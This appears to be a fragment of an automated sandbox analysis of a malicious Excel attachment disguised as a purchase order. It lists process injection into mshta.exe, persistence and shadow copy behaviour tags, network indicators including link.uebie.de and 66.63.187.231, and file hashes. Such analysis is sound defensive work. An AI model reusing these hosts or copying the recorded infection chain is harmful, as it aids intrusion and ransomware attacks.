PID 2668 wrote to memory of 2168 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 2668 wrote to memory of 2168 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\19112024_0849_18112024_PO-000041492.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 link.uebie.de udp
DE 5.45.108.48:443 link.uebie.de tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 48.108.45.5.in-addr.arpa udp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 88.221.135.113:80 e6.o.lencr.org tcp
US 66.63.187.231:80 66.63.187.231 tcp
US 8.8.8.8:53 125.21.192.23.in-addr.arpa udp
US 8.8.8.8:53 113.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 231.187.63.66.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 200.79.70.13.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 134.130.81.91.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/2668-0-0x00007FFB39C30000-0x00007FFB39C40000-memory.dmp

memory/2668-3-0x00007FFB79C4D000-0x00007FFB79C4E000-memory.dmp

memory/2668-2-0x00007FFB39C30000-0x00007FFB39C40000-memory.dmp

memory/2668-1-0x00007FFB39C30000-0x00007FFB39C40000-memory.dmp

memory/2668-5-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-4-0x00007FFB39C30000-0x00007FFB39C40000-memory.dmp

memory/2668-8-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-9-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-10-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-12-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-13-0x00007FFB37A90000-0x00007FFB37AA0000-memory.dmp

memory/2668-11-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-7-0x00007FFB39C30000-0x00007FFB39C40000-memory.dmp

memory/2668-6-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-14-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-15-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-17-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-16-0x00007FFB37A90000-0x00007FFB37AA0000-memory.dmp

memory/2668-20-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-19-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-21-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-18-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2168-39-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2168-42-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2168-46-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2168-45-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-51-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2168-52-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2168-53-0x00007FF7AB920000-0x00007FF7AB928000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 aec0871fd8096f0bb7d3cd4f2623c5c9
SHA1 a294aa235e2620c3ab5a16ff168e911585ce2680
SHA256 16b85a23b0efe2543b8f122e11ee554b31f72384509c4084b2c89cdedca413b3
SHA512 8ab42c6943adf65fc28cd48e64cb18811cca2e7d6a34708c77a31db10516508f7153bca35048fa7ecc851e715bd2e4b5354328ebd841f644caa3cdd2a66049ea